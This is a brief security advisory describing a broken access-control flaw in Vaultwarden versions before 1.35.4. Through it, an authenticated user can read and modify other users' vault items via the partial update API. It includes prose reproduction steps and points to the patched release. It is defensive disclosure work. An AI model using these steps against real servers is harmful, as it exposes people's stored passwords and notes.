Vaultwarden Unauthorized Access Vulnerability via Partial Update API on User Ciphers

A vulnerability in Vaultwarden, an unofficial Bitwarden-compatible server, allows authenticated regular users to access and modify another user's cipher details through the partial update API. This issue affects Vaultwarden versions prior to 1.35.4. The vulnerability arises because the partial update endpoint lacks proper ownership and access control checks, inadvertently exposing sensitive information such as names, notes, and secure data. Additionally, in filesystem deployments, the vulnerability allows unauthorized access to attachment data via a tokenized endpoint, potentially leading to account compromise and secondary impacts.

Impact

Exploitation of this vulnerability results in unauthorized access to other users' cipher information, including sensitive data and authentication credentials, which can be used to compromise accounts and facilitate lateral movement within the system.

Reproduction

To reproduce this vulnerability, an authenticated regular user must obtain a valid JWT and know the target user's cipher ID. After confirming that standard retrieval access is denied for that cipher, the user can send a request to the partial update API endpoint with the specified cipher ID. The response will include a 200 OK status and disclose the cipher details, such as the name, notes, and any attached files.

Remediation

Users can update to Vaultwarden version 1.35.4 or later, where this vulnerability has been patched.